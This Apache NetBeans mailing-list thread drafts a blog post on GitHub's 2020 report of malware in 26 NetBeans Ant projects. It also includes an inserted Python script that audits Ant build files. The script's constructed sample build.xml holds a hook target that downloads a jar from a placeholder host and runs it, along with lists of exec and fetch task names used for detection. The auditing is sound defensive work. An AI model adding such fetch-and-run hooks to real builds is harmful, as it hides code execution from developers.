Posted to dev@netbeans.apache.org by Geertjan Wielenga <ge...@apache.org> on 2020/05/31 17:08:15 UTC

Proposed blog on malware report

Hi all,

I propose we publish the following on the Apache NetBeans blog re the
recent announcement by GitHub researchers of malware found in some NetBeans
generated projects on GitHub.

Title: Malware Found in 26 NetBeans Ant Projects on GitHub

Content:

"Researchers at GitHub have identified 26 projects on GitHub that have been
infected by malware. The malware infiltrates the project structure of
Ant-based applications in the format generated specifically by NetBeans.
The owners of the 26 projects, which are mostly small Java applications,
have been contacted and the infected projects have been set to private on
GitHub. The malware campaign is no longer active, GitHub did not consider
it relevant enough to be in touch with the NetBeans community about it, and
there is no evidence that applications beyond the 26 in question have been
impacted. Be aware that any project structure that you use when developing
applications can be infiltrated by malware and make sure that the files you
check into your versioning system are your own or that you know where they
come from and what they do."


Feedback welcome and needed.

Gj

Re: Re: Proposed blog on malware report

Posted by Erik Costlow <er...@outlook.com>.
The initial vector is unknown. With a total of 26 repositories for unknown projects identified among millions of Java repositories, this looks to me like someone was tinkering with malware creation and happened to be using this older build system. With the small number maybe the author owned the repos.
The entry point is not through NetBeans (unless someone clones those repos). If there were, it would prompt more prudent action to resolve the issue and improve defenses.
Even if NetBeans removed that ant build mechanism, one would simply move the payload into a different part of the build system such as a maven plugin, gradle command, or anything else that executes such as a unit test.

These supply chain attacks are becoming more common; I've seen them over with Node, Ruby, and an older one that went after Facebook devs. People check code out in IDEs to read it better and work with tools. If checking code out runs commands, that creates an opportunity (even if via the build system).

A good mechanism here for defense would be enumerating what runs and where code comes from. There's a field here called "Software Composition Analysis" that does some of this but it is dependency-focused rather than build-focused.
I would first map the attack surface, which in this case is what runs (scripts, code, etc.) and what gets downloaded as a project is checked out, built, and tested/run. If you'd cloned one of those 26 repos, what would you like to have seen? Microsoft AppInspector is a moderately close example (https://www.microsoft.com/security/blog/2020/01/16/introducing-microsoft-application-inspector/) for later in the dev cycle.
Then I would use that map to isolate sensitive operations from the developer machine. Maybe new projects build in isolated containers. Maybe people enable a certain build config and run the rest: first-time with minimal prompts.

________________________________
From: Eric Bresie <eb...@gmail.com>
Sent: Thursday, June 4, 2020 12:02 AM
To: Netbeans Developer List <de...@netbeans.apache.org>
Subject: Re: Re: Proposed blog on malware report

> On June 1, 2020 at 6:29:33 AM CDT, Geertjan Wielenga <ge...@apache.org> wrote:
> > On Mon, Jun 1, 2020 at 1:27 PM Geertjan Wielenga <ge...@apache.org> wrote:
> > > On Mon, Jun 1, 2020 at 11:55 AM Sally Khudairi <sk...@apache.org> wrote:
> > > On Mon, Jun 1, 2020, at 02:48, Geertjan Wielenga wrote:
> > > >
> > > > Hi Sally,
> > > >
> > > > We propose putting the below on the Apache NetBeans blog re the GitHub
> > > > malware report on the inactive malware campaign.
> > > >
> > > > To everyone else — Sally is VP Marketing and Publicity at Apache.
> > > >
> > > > Thanks, and thanks Eric for your rewrite of the text.
> > > >
> > > > Gj
> > > >
> > > > On Sun, 31 May 2020 at 22:39, Erik Costlow <er...@outlook.com> wrote:
> > > > > If making any comment at all, I would rewrite. If there were a
> > > > > vulnerability or the attack was large, I'm sure the GitHub team would have
> > > > > gotten in touch. The key themes are:
> > > > >
> > > > > 1. The attack was small, isolated, and is over
> > > > > 2. Most builds do not leverage anything netbeans-specific, such as
> > > > > this ant build (I guessed at 2006)
> > > > > 3. Software supply chain risk is legitimate and if action were needed
> > > > > or is needed in the future, something would happen
> > > > >
> > > > > Researchers at GitHub have identified 26 projects on GitHub that have
> > > > > been infected by malware. The initial point of infection is undetermined
> > > > > and all activity with the malware has been shut down. The malware relied on
> > > > > projects created using an older customized ant-based build system that has
> > > > > been in limited use since 2006. This does not impact users of other build
> > > > > systems like Maven or Gradle, or even most ant users. The majority of
> > > > > NetBeans projects leverage native build tool integrations that is shared
> > > > > with continuous integration systems.
> > > > > With over 44 million repositories hosted on GitHub[2], the scope of
> > > > > these 26 projects looks isolated and does not significantly impact the
> > > > > NetBeans community.
> > > > > Software Supply Chain attacks are not unique to any IDE and the
> > > > > NetBeans contributor team will monitor the threat landscape to keep
> > > > > developers safe and aware.
> > > > >
> > > > > [1] https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain
> > > > > [2] https://www.zdnet.com/article/github-tops-40-million-developers-as-python-data-science-machine-learning-popularity-surges/
> > > > >
> > > > >
> > > > > "Researchers at GitHub have identified 26 projects on GitHub that have been
> > > > > infected by malware. The malware infiltrates the project structure of
> > > > > Ant-based applications in the format generated specifically by NetBeans.
> > > > > The owners of the 26 projects, which are mostly small Java applications,
> > > > > have been contacted and the infected projects have been set to private on
> > > > > GitHub. The malware campaign is no longer active, GitHub did not consider
> > > > > it relevant enough to be in touch with the NetBeans community about it, and
> > > > > there is no evidence that applications beyond the 26 in question have been
> > > > > impacted. Be aware that any project structure that you use when developing
> > > > > applications can be infiltrated by malware and make sure that the files you
> > > > > check into your versioning system are your own or that you know where they
> > > > > come from and what they do."
> > > > >
> > > > >
> > > > > ________________________________
> > > > > From: Neil C Smith <ne...@apache.org>
> > > > > Sent: Sunday, May 31, 2020 1:51 PM
> > > > > To: dev <de...@netbeans.apache.org>
> > > > > Subject: Re: Proposed blog on malware report
> > > > >
> > > > > On Sun, 31 May 2020, 18:08 Geertjan Wielenga, <ge...@apache.org> wrote:
> > > > >
> > > > > > Be aware that any project structure that you use when developing
> > > > > > applications can be infiltrated by malware and make sure that the files you
> > > > > > check into your versioning system are your own or that you know where they
> > > > > > come from and what they do."
> > > > > >
> > > > > >
> > > > > > Feedback welcome and needed.
> > > > > >
> > > > >
> > > > > Looks good to me, but I'd be tempted to emphasise "when developing
> > > > > applications, with any IDE or build system, ..." And also that you should
> > > > > treat building untrusted code the same way you'd treat running untrusted
> > > > > binaries, ie. carefully.
> > > > >
> > > > > Interesting that the GitHub article doesn't mention that this applies to
> > > > > projects that were originally structured with Ant in NetBeans. You wouldn't
> > > > > have to still be building in the IDE to be exploited here?
> > > > >
> > > > > Best wishes,
> > > > >
> > > > > Neil
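
Erik's suggestion above, to enumerate what runs and what gets downloaded as a project is checked out and built, can be mechanised for Apache Ant projects. The following is an added example written for this page; it is not code from this thread or from the Apache NetBeans project. It assumes Apache Ant's own task names (exec, apply, java, script, scriptdef, taskdef, typedef, sshexec, get, ftp, scp), the NetBeans-generated layout in which build.xml imports nbproject/build-impl.xml and exposes hook targets such as -post-jar, and a small constructed sample project (the example.invalid URL is a placeholder, not a real location).

```python
"""Enumerate what a freshly cloned Ant project would execute or download.

Added example, not code from this thread or from the Apache NetBeans project.
It walks a checkout, finds Apache Ant build files (a NetBeans-generated
build.xml imports nbproject/build-impl.xml), and lists the tasks that spawn
processes, load code, or fetch remote content, so they can be reviewed before
the project is built. The sample project at the bottom is constructed.
"""
import os
import tempfile
import xml.etree.ElementTree as ET

# Apache Ant tasks that run code or spawn processes (core/optional task names).
EXEC_TASKS = {"exec", "apply", "java", "script", "scriptdef", "taskdef", "typedef", "sshexec"}
# Apache Ant tasks that pull content from outside the checkout.
FETCH_TASKS = {"get", "ftp", "scp"}


def ant_build_files(root):
    """Yield every XML file under root whose document element is <project>,
    i.e. an Ant build file (build.xml, NetBeans' nbproject/build-impl.xml, ...)."""
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if not name.endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            try:
                if ET.parse(path).getroot().tag == "project":
                    yield path
            except ET.ParseError:
                continue  # not well-formed XML, so not an Ant build file


def build_surface(build_file):
    """Return (target, task, detail) triples for each task in build_file that
    executes something, pulls build logic in, or downloads content."""
    root = ET.parse(build_file).getroot()
    findings = []
    for imp in root.iter("import"):  # build logic pulled in from another file
        findings.append(("(project)", "import", imp.get("file", "")))
    for target in root.iter("target"):
        tname = target.get("name", "")
        for elem in target.iter():
            if elem.tag in EXEC_TASKS:
                detail = (elem.get("executable") or elem.get("classname")
                          or elem.get("jar") or elem.get("classpath")
                          or elem.get("language") or elem.get("host") or "")
                findings.append((tname, elem.tag, detail))
            elif elem.tag in FETCH_TASKS:
                findings.append((tname, elem.tag, elem.get("src") or elem.get("server") or ""))
    return findings


def audit_checkout(root):
    """Map each Ant build file (path relative to root) to its execution/download surface."""
    return {os.path.relpath(p, root): build_surface(p) for p in ant_build_files(root)}


# --- constructed sample: NetBeans-style layout with one hook target filled in ---
SAMPLE_BUILD_XML = """<?xml version="1.0" encoding="UTF-8"?>
<project name="SampleApp" default="default" basedir=".">
    <import file="nbproject/build-impl.xml"/>
    <!-- NetBeans leaves hook targets such as -post-jar for the developer; this
         constructed one fetches and runs a jar, which is exactly what a reviewer
         of an untrusted checkout wants surfaced. -->
    <target name="-post-jar">
        <get src="https://example.invalid/helper.jar" dest="lib/helper.jar"/>
        <java jar="lib/helper.jar" fork="true"/>
    </target>
</project>
"""
SAMPLE_BUILD_IMPL = """<?xml version="1.0" encoding="UTF-8"?>
<project name="SampleApp-impl" default="default" basedir="..">
    <target name="compile">
        <mkdir dir="build/classes"/>
        <javac srcdir="src" destdir="build/classes"/>
    </target>
    <target name="jar" depends="compile">
        <jar destfile="dist/SampleApp.jar" basedir="build/classes"/>
    </target>
</project>
"""


def write_sample_project(root):
    """Write the constructed two-file project under root and return root."""
    os.makedirs(os.path.join(root, "nbproject"), exist_ok=True)
    with open(os.path.join(root, "build.xml"), "w", encoding="utf-8") as f:
        f.write(SAMPLE_BUILD_XML)
    with open(os.path.join(root, "nbproject", "build-impl.xml"), "w", encoding="utf-8") as f:
        f.write(SAMPLE_BUILD_IMPL)
    return root


def audit_sample():
    """Audit the constructed project from a temporary directory."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_checkout(write_sample_project(tmp))


if __name__ == "__main__":
    for path, findings in audit_sample().items():
        print(path)
        for target, task, detail in findings or [("-", "nothing flagged", "")]:
            print(f"  {target:12} {task:8} {detail}")
```

To use it on a real clone, call audit_checkout(path) instead of audit_sample(). For a plain NetBeans Ant project the expected baseline is one import of nbproject/build-impl.xml and nothing flagged in the generated file itself; anything that appears under a hook target, or any exec/java/get task that was not there when the project was generated, is what to read before the first build. The walker only reports task names it knows, so a task registered through taskdef under another name shows up as the taskdef itself and the body of an inline script task still has to be read by hand.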

Re: Re: Proposed blog on malware report

Posted by Eric Bresie <eb...@gmail.com>.
So a few comments:

(1) So am I reading this right that the problem is that 26 “repositories” are infected? So does that mean someone forked/cloned/created a given repository, worked locally using an Ant-based project, may have had malware on their system, infected files in the local repository, then uploaded it? So then is this more a problem of a given machine not having malware scans on their systems to locate and remove it before committing changes to a given repository?

(2) Is it worth checking to see if there are any GitHub Actions or Travis CI jobs to run a virus/malware scanner during a GitHub commit or build at some point? Maybe if a change committed any infection it would fail the build?

(3) For the repositories in question (still unclear which ones, unless they’ve been contacted separately), assume some form of PR or commit happened when the infection occurred. Is it possible to identify the initial source and (1) ensure they are notified of the need to possibly clean out any local malware-infected files, (2) ensure this was not done maliciously, etc.?

(4) If the problem is due to a NetBeans Ant project structure, does this mean some form of change of structure could prevent this? If this is due to Ant, then does the Apache Ant team have anything to add or fix for this?

(5) Is some ticket needed to update NetBeans in any way to help mitigate this in some way? Or in each impacted repository?

Sure there could be more but to further the discussion.

Eric Bresie
Ebresie@gmail.com
> On June 1, 2020 at 6:29:33 AM CDT, Geertjan Wielenga <ge...@apache.org> wrote:

Re: Proposed blog on malware report

Posted by Geertjan Wielenga <ge...@apache.org>.
Also sent it to announce@apache.org.

I'll wait a few hours for any comments anyone has on the text, which is a
bit of a mosaic of the comments throughout this thread -- mostly by Eric
Costlow, many thanks! -- and will then tweet this, etc.

Gj

On Mon, Jun 1, 2020 at 1:27 PM Geertjan Wielenga <ge...@apache.org>
wrote:


Re: Proposed blog on malware report

Posted by Geertjan Wielenga <ge...@apache.org>.
https://blogs.apache.org/netbeans/entry/newly-identified-inactive-malware-campaign

There it is!

Gj

On Mon, Jun 1, 2020 at 11:55 AM Sally Khudairi <sk...@apache.org> wrote:


Re: Proposed blog on malware report

Posted by Sally Khudairi <sk...@apache.org>.
Thank you, Geertjan; hello, everyone.

Great work -- I first noticed what had happened from Emilian's, followed by your, tweets yesterday. I see that quite a few articles are out on this Octopus Scanner campaign.

Rapid response is essential to avoid further confusion/miscommunication, so great work on getting on this straight away.

I have two minor requests: if you could 1) please refer to "Apache Ant" and "Apache NetBeans" upon the first mention of the projects in the post, that would be great. Also, 2) send this to announce@apache.org so we can help spread the word.

I'll be standing by to help with any media queries that come through for the PMC.

Many kind thanks for your ongoing efforts.

Best,
Sally

- - -
Vice President Marketing & Publicity
Vice President Sponsor Relations
The Apache Software Foundation

Tel +1 617 921 8656 | sk@apache.org


On Mon, Jun 1, 2020, at 02:48, Geertjan Wielenga wrote:
> 
> Hi Sally,
> 
> We propose putting the below on the Apache NetBeans blog re the GitHub malware report on the inactive malware campaign.
> 
> To everyone else — Sally is VP Marketing and Publicity at Apache.
> 
> Thanks, and thanks Eric for your rewrite of the text.
> 
> Gj
> 
> On Sun, 31 May 2020 at 22:39, Erik Costlow <er...@outlook.com> wrote:
>> If making any comment at all, I would rewrite. If there were a vulnerability or the attack was large, I'm sure the GitHub team would have gotten in touch. The key themes are:
>> 
>>  1. The attack was small, isolated, and is over
>>  2. Most builds do not leverage anything netbeans-specific, such as this ant build (I guessed at 2006)
>>  3. Software supply chain risk is legitimate and if action were needed or is needed in the future, something would happen
>> 
>> Researchers at GitHub have identified 26 projects on GitHub that have been infected by malware. The initial point of infection is undetermined and all activity with the malware has been shut down. The malware relied on projects created using an older customized ant-based build system that has been in limited use since 2006. This does not impact users of other build systems like Maven or Gradle, or even most ant users. The majority of NetBeans projects leverage native build tool integrations that are shared with continuous integration systems.
>> With over 44 million repositories hosted on GitHub[2], the scope of these 26 projects looks isolated and does not significantly impact the NetBeans community.
>> Software Supply Chain attacks are not unique to any IDE and the NetBeans contributor team will monitor the threat landscape to keep developers safe and aware.
>> 
>> [1] https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain
>> [2] https://www.zdnet.com/article/github-tops-40-million-developers-as-python-data-science-machine-learning-popularity-surges/
>> 
>> 
>> "Researchers at GitHub have identified 26 projects on GitHub that have been
>> infected by malware. The malware infiltrates the project structure of
>> Ant-based applications in the format generated specifically by NetBeans.
>> The owners of the 26 projects, which are mostly small Java applications,
>> have been contacted and the infected projects have been set to private on
>> GitHub. The malware campaign is no longer active, GitHub did not consider
>> it relevant enough to be in touch with the NetBeans community about it, and
>> there is no evidence that applications beyond the 26 in question have been
>> impacted. Be aware that any project structure that you use when developing
>> applications can be infiltrated by malware and make sure that the files you
>> check into your versioning system are your own or that you know where they
>> come from and what they do."
>> 
>> 
>> ________________________________
>> From: Neil C Smith <ne...@apache.org>
>> Sent: Sunday, May 31, 2020 1:51 PM
>> To: dev <de...@netbeans.apache.org>
>> Subject: Re: Proposed blog on malware report
>> 
>> On Sun, 31 May 2020, 18:08 Geertjan Wielenga, <ge...@apache.org> wrote:
>> 
>> > Be aware that any project structure that you use when developing
>> > applications can be infiltrated by malware and make sure that the files you
>> > check into your versioning system are your own or that you know where they
>> > come from and what they do."
>> >
>> >
>> > Feedback welcome and needed.
>> >
>> 
>> Looks good to me, but I'd be tempted to emphasise "when developing
>> applications, with any IDE or build system, ..." And also that you should
>> treat building untrusted code the same way you'd treat running untrusted
>> binaries, i.e. carefully.
>> 
>> Interesting that the GitHub article doesn't mention that this applies to
>> projects that were originally structured with Ant in NetBeans. You wouldn't
>> have to still be building in the IDE to be exploited here?
>> 
>> Best wishes,
>> 
>> Neil
>> 
>> >

Re: Proposed blog on malware report

Posted by Geertjan Wielenga <ge...@apache.org>.
Hi Sally,

We propose putting the below on the Apache NetBeans blog re the GitHub
malware report on the inactive malware campaign.

To everyone else — Sally is VP Marketing and Publicity at Apache.

Thanks, and thanks Eric for your rewrite of the text.

Gj

On Sun, 31 May 2020 at 22:39, Erik Costlow <er...@outlook.com> wrote:

> If making any comment at all, I would rewrite. If there were a
> vulnerability or the attack was large, I'm sure the GitHub team would have
> gotten in touch. The key themes are:
>
>   1.  The attack was small, isolated, and is over
>   2.  Most builds do not leverage anything netbeans-specific, such as this
> ant build (I guessed at 2006)
>   3.  Software supply chain risk is legitimate and if action were needed
> or is needed in the future, something would happen
>
> Researchers at GitHub have identified 26 projects on GitHub that have been
> infected by malware. The initial point of infection is undetermined and all
> activity with the malware has been shut down. The malware relied on
> projects created using an older customized ant-based build system that has
> been in limited use since 2006. This does not impact users of other build
> systems like Maven or Gradle, or even most ant users. The majority of
> NetBeans projects leverage native build tool integrations that are shared
> with continuous integration systems.
> With over 44 million repositories hosted on GitHub[2], the scope of these
> 26 projects looks isolated and does not significantly impact the NetBeans
> community.
> Software Supply Chain attacks are not unique to any IDE and the NetBeans
> contributor team will monitor the threat landscape to keep developers safe
> and aware.
>
> [1]
> https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain
> [2]
> https://www.zdnet.com/article/github-tops-40-million-developers-as-python-data-science-machine-learning-popularity-surges/
>
>
> "Researchers at GitHub have identified 26 projects on GitHub that have been
> infected by malware. The malware infiltrates the project structure of
> Ant-based applications in the format generated specifically by NetBeans.
> The owners of the 26 projects, which are mostly small Java applications,
> have been contacted and the infected projects have been set to private on
> GitHub. The malware campaign is no longer active, GitHub did not consider
> it relevant enough to be in touch with the NetBeans community about it, and
> there is no evidence that applications beyond the 26 in question have been
> impacted. Be aware that any project structure that you use when developing
> applications can be infiltrated by malware and make sure that the files you
> check into your versioning system are your own or that you know where they
> come from and what they do."
>
>
> ________________________________
> From: Neil C Smith <ne...@apache.org>
> Sent: Sunday, May 31, 2020 1:51 PM
> To: dev <de...@netbeans.apache.org>
> Subject: Re: Proposed blog on malware report
>
> On Sun, 31 May 2020, 18:08 Geertjan Wielenga, <ge...@apache.org> wrote:
>
> > Be aware that any project structure that you use when developing
> > applications can be infiltrated by malware and make sure that the files
> you
> > check into your versioning system are your own or that you know where
> they
> > come from and what they do."
> >
> >
> > Feedback welcome and needed.
> >
>
> Looks good to me, but I'd be tempted to emphasise "when developing
> applications, with any IDE or build system, ..." And also that you should
> treat building untrusted code the same way you'd treat running untrusted
> binaries, i.e. carefully.
>
> Interesting that the GitHub article doesn't mention that this applies to
> projects that were originally structured with Ant in NetBeans. You wouldn't
> have to still be building in the IDE to be exploited here?
>
> Best wishes,
>
> Neil
>
> >
>

Re: Proposed blog on malware report

Posted by Josh Juneau <ju...@gmail.com>.
+1 on a prompt response


Josh Juneau
juneau001@gmail.com
http://jj-blogger.blogspot.com
https://www.apress.com/us/search?query=Juneau

>> On May 31, 2020, at 4:28 PM, Glenn Holmer <ce...@kolabnow.com.invalid> wrote:
> On 5/31/20 3:39 PM, Erik Costlow wrote:
>> If making any comment at all, I would rewrite.
> 
> The most important thing is to get something out there and strike while
> the iron's hot. This "story" has even hit Slashdot:
> 
> https://news.slashdot.org/story/20/05/30/2031219/github-warns-java-developers-of-new-malware-poisoning-netbeans-projects
> 
> -- 
> Glenn Holmer (Linux registered user #16682)
> "After the vintage season came the aftermath -- and Cenbe."
> 
> 
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: dev-unsubscribe@netbeans.apache.org
> For additional commands, e-mail: dev-help@netbeans.apache.org
> 
> For further information about the NetBeans mailing lists, visit:
> https://cwiki.apache.org/confluence/display/NETBEANS/Mailing+lists

Re: Proposed blog on malware report

Posted by Glenn Holmer <ce...@kolabnow.com.INVALID>.
On 5/31/20 3:39 PM, Erik Costlow wrote:
> If making any comment at all, I would rewrite.

The most important thing is to get something out there and strike while
the iron's hot. This "story" has even hit Slashdot:

https://news.slashdot.org/story/20/05/30/2031219/github-warns-java-developers-of-new-malware-poisoning-netbeans-projects

-- 
Glenn Holmer (Linux registered user #16682)
"After the vintage season came the aftermath -- and Cenbe."


Re: Proposed blog on malware report

Posted by Jesse Glick <ty...@gmail.com>.
Just a couple minor remarks here:

On Sun, May 31, 2020 at 4:39 PM Erik Costlow <er...@outlook.com> wrote:
> This does not impact users of other build systems […] or even most ant users.

Specifically, if you use either freeform or autoproject you can use
Ant as the build tool for your NetBeans project without the specific
project layout targeted by this attack.

> The majority of NetBeans projects leverage native build tool integrations that is shared with continuous integration systems.

The managed Ant-based project types (such as in the `java.j2seproject`
module) _can_ be shared with CI systems. In fact this was a key design
goal at the time, when Java developers would typically do local builds
using proprietary IDE tooling, and then write something else for CI
(if they were doing CI at all) and try to keep the two sets of
configurations in synch.


Re: Proposed blog on malware report

Posted by Erik Costlow <er...@outlook.com>.
If making any comment at all, I would rewrite. If there were a vulnerability or the attack was large, I'm sure the GitHub team would have gotten in touch. The key themes are:

  1.  The attack was small, isolated, and is over
  2.  Most builds do not leverage anything netbeans-specific, such as this ant build (I guessed at 2006)
  3.  Software supply chain risk is legitimate and if action were needed or is needed in the future, something would happen

Researchers at GitHub have identified 26 projects on GitHub that have been infected by malware. The initial point of infection is undetermined and all activity with the malware has been shut down. The malware relied on projects created using an older customized ant-based build system that has been in limited use since 2006. This does not impact users of other build systems like Maven or Gradle, or even most ant users. The majority of NetBeans projects leverage native build tool integrations that are shared with continuous integration systems.
With over 44 million repositories hosted on GitHub[2], the scope of these 26 projects looks isolated and does not significantly impact the NetBeans community.
Software Supply Chain attacks are not unique to any IDE and the NetBeans contributor team will monitor the threat landscape to keep developers safe and aware.

[1] https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain
[2] https://www.zdnet.com/article/github-tops-40-million-developers-as-python-data-science-machine-learning-popularity-surges/


"Researchers at GitHub have identified 26 projects on GitHub that have been
infected by malware. The malware infiltrates the project structure of
Ant-based applications in the format generated specifically by NetBeans.
The owners of the 26 projects, which are mostly small Java applications,
have been contacted and the infected projects have been set to private on
GitHub. The malware campaign is no longer active, GitHub did not consider
it relevant enough to be in touch with the NetBeans community about it, and
there is no evidence that applications beyond the 26 in question have been
impacted. Be aware that any project structure that you use when developing
applications can be infiltrated by malware and make sure that the files you
check into your versioning system are your own or that you know where they
come from and what they do."


________________________________
From: Neil C Smith <ne...@apache.org>
Sent: Sunday, May 31, 2020 1:51 PM
To: dev <de...@netbeans.apache.org>
Subject: Re: Proposed blog on malware report

On Sun, 31 May 2020, 18:08 Geertjan Wielenga, <ge...@apache.org> wrote:

> Be aware that any project structure that you use when developing
> applications can be infiltrated by malware and make sure that the files you
> check into your versioning system are your own or that you know where they
> come from and what they do."
>
>
> Feedback welcome and needed.
>

Looks good to me, but I'd be tempted to emphasise "when developing
applications, with any IDE or build system, ..." And also that you should
treat building untrusted code the same way you'd treat running untrusted
binaries, i.e. carefully.

Interesting that the GitHub article doesn't mention that this applies to
projects that were originally structured with Ant in NetBeans. You wouldn't
have to still be building in the IDE to be exploited here?

Best wishes,

Neil

>

Re: Proposed blog on malware report

Posted by Neil C Smith <ne...@apache.org>.
On Sun, 31 May 2020, 18:08 Geertjan Wielenga, <ge...@apache.org> wrote:

> Be aware that any project structure that you use when developing
> applications can be infiltrated by malware and make sure that the files you
> check into your versioning system are your own or that you know where they
> come from and what they do."
>
>
> Feedback welcome and needed.
>

Looks good to me, but I'd be tempted to emphasise "when developing
applications, with any IDE or build system, ..." And also that you should
treat building untrusted code the same way you'd treat running untrusted
binaries, i.e. carefully.

Interesting that the GitHub article doesn't mention that this applies to
projects that were originally structured with Ant in NetBeans. You wouldn't
have to still be building in the IDE to be exploited here?

Best wishes,

Neil

>

Re: Proposed blog on malware report

Posted by Geertjan Wielenga <ge...@apache.org>.
Yes, agree with that — I think we should take Eric’s rewrite of my
proposal, link to the report and also link to Jaroslav’s blog entry.

Gj

On Mon, 1 Jun 2020 at 10:33, Neil C Smith <ne...@apache.org> wrote:

> On Mon, 1 Jun 2020 at 08:30, Jaroslav Tulach <ja...@gmail.com>
> wrote:
> > My personal take on the malware situation is available at
> > http://wiki.apidesign.org/wiki/Malware
>
> You have a talent for better saying what I'm thinking! :-)
>
> I don't know whether we or you would be happy with reblogging that
> from here, or whether that's entirely appropriate?  But the points
> raised in the "Don't blame the editor" and "Vulnerable build systems"
> sections, as well as the reasons behind defaulting to Maven projects,
> have to be in any post on this from NetBeans side IMO.
>
> Best wishes,
>
> Neil
>

Re: Proposed blog on malware report

Posted by Jaroslav Tulach <ja...@gmail.com>.
Feel free to copy my text ideas, make it less personal and republish where
appropriate.
-jt


po 1. 6. 2020 v 10:33 odesílatel Neil C Smith <ne...@apache.org>
napsal:

> On Mon, 1 Jun 2020 at 08:30, Jaroslav Tulach <ja...@gmail.com>
> wrote:
> > My personal take on the malware situation is available at
> > http://wiki.apidesign.org/wiki/Malware
>
> You have a talent for better saying what I'm thinking! :-)
>
> I don't know whether we or you would be happy with reblogging that
> from here, or whether that's entirely appropriate?  But the points
> raised in the "Don't blame the editor" and "Vulnerable build systems"
> sections, as well as the reasons behind defaulting to Maven projects,
> have to be in any post on this from NetBeans side IMO.
>
> Best wishes,
>
> Neil
>

Re: Proposed blog on malware report

Posted by Neil C Smith <ne...@apache.org>.
On Mon, 1 Jun 2020 at 08:30, Jaroslav Tulach <ja...@gmail.com> wrote:
> My personal take on the malware situation is available at
> http://wiki.apidesign.org/wiki/Malware

You have a talent for better saying what I'm thinking! :-)

I don't know whether we or you would be happy with reblogging that
from here, or whether that's entirely appropriate?  But the points
raised in the "Don't blame the editor" and "Vulnerable build systems"
sections, as well as the reasons behind defaulting to Maven projects,
have to be in any post on this from NetBeans side IMO.

Best wishes,

Neil

Re: Proposed blog on malware report

Posted by Jaroslav Tulach <ja...@gmail.com>.
My personal take on the malware situation is available at
http://wiki.apidesign.org/wiki/Malware
-jt


ne 31. 5. 2020 v 19:08 odesílatel Geertjan Wielenga <ge...@apache.org>
napsal:

> Hi all,
>
> I propose we publish the following on the Apache NetBeans blog re the
> recent announcement by GitHub researchers of malware found in some NetBeans
> generated projects on GitHub.
>
> Title: Malware Found in 26 NetBeans Ant Projects on GitHub
>
> Content:
>
> "Researchers at GitHub have identified 26 projects on GitHub that have been
> infected by malware. The malware infiltrates the project structure of
> Ant-based applications in the format generated specifically by NetBeans.
> The owners of the 26 projects, which are mostly small Java applications,
> have been contacted and the infected projects have been set to private on
> GitHub. The malware campaign is no longer active, GitHub did not consider
> it relevant enough to be in touch with the NetBeans community about it, and
> there is no evidence that applications beyond the 26 in question have been
> impacted. Be aware that any project structure that you use when developing
> applications can be infiltrated by malware and make sure that the files you
> check into your versioning system are your own or that you know where they
> come from and what they do."
>
>
> Feedback welcome and needed.
>
> Gj
>